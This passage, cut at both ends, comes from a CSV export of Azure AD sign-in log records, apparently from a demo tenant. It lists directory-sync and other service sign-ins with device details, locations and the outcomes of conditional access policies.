'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 07:56,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",7ad10e9e-8b94-4b07-9307-1c32640b0700,,,"{'countryOrRegion': 'DZ', 'geoCoordinates': {'longitude': 3, 'latitude': 28}}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Skype for Business Online,7ad10e9e-8b94-4b07-9307-1c32640b0700,SigninLogs,Sucess,28,3
+844,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,21:00.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,e1d18bca-e7b2-41fc-bbe6-066eb3db388c,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 01:21,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",46ab66bf-13d5-46c8-a514-03b712000700,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,46ab66bf-13d5-46c8-a514-03b712000700,SigninLogs,Sucess,36.6404686,-78.26995087
+845,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,21:05.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,eb5014d1-453a-4c86-9c88-a4ad1263556c,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 03:21,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",2903ae2d-5f7e-48a4-9564-1a66757c0800,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,2903ae2d-5f7e-48a4-9564-1a66757c0800,SigninLogs,Sucess,36.6404686,-78.26995087
+846,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,25:02.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,7390c1df-8e74-433c-b24b-2dfb0e2d68a3,Microsoft.aadiam,Microsoft.aadiam,,Message Trace Reporting,4,NL,Office 365 Exchange Online,00000002-0000-0ff1-ce00-000000000000,Exchange Online PowerShell,[],notApplied,09/04/2020 03:25,{'deviceId': ''},2903ae2d-5f7e-48a4-9564-1a66a58c0800,,,"{'countryOrRegion': 'NL', 'geoCoordinates': {'longitude': 4.940189838409424, 'latitude': 52.309051513671875}, 'state': 'Noord-Holland', 'city': 'Amsterdam'}",none,none,none,none,[],{'errorCode': 0},Message Trace Reporting,430f7f57-0d1a-4a8a-b8f5-5c5c0770ecaa,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,2903ae2d-5f7e-48a4-9564-1a66a58c0800,SigninLogs,Sucess,52.30905151,4.940189838
+847,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,21:00.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,a22683c9-31ee-451e-8986-0b7bea1144ab,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 03:21,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",f7ba3cc7-11fe-4554-9ac4-efce70720800,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,f7ba3cc7-11fe-4554-9ac4-efce70720800,SigninLogs,Sucess,36.6404686,-78.26995087
+848,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,21:05.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,45d1bf75-3345-4076-b220-0653b1c12437,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 01:21,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",3d0c3f7f-0767-4d3e-a7bd-a84ba3ce0600,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,3d0c3f7f-0767-4d3e-a7bd-a84ba3ce0600,SigninLogs,Sucess,36.6404686,-78.26995087
+849,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,21:05.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,eb5014d1-453a-4c86-9c88-a4ad1263556c,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 03:21,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",2903ae2d-5f7e-48a4-9564-1a66757c0800,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,2903ae2d-5f7e-48a4-9564-1a66757c0800,SigninLogs,Sucess,36.6404686,-78.26995087
+850,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:00.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,e4eff33f-7e0e-4669-b86f-19e7be6fb5f7,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 03:51,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",80d584c4-dd35-4dcb-882c-05932ccc0800,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,80d584c4-dd35-4dcb-882c-05932ccc0800,SigninLogs,Sucess,36.6404686,-78.26995087
+851,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,21:00.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,a22683c9-31ee-451e-8986-0b7bea1144ab,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 03:21,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",f7ba3cc7-11fe-4554-9ac4-efce70720800,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,f7ba3cc7-11fe-4554-9ac4-efce70720800,SigninLogs,Sucess,36.6404686,-78.26995087
+852,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,21:00.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,e1d18bca-e7b2-41fc-bbe6-066eb3db388c,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 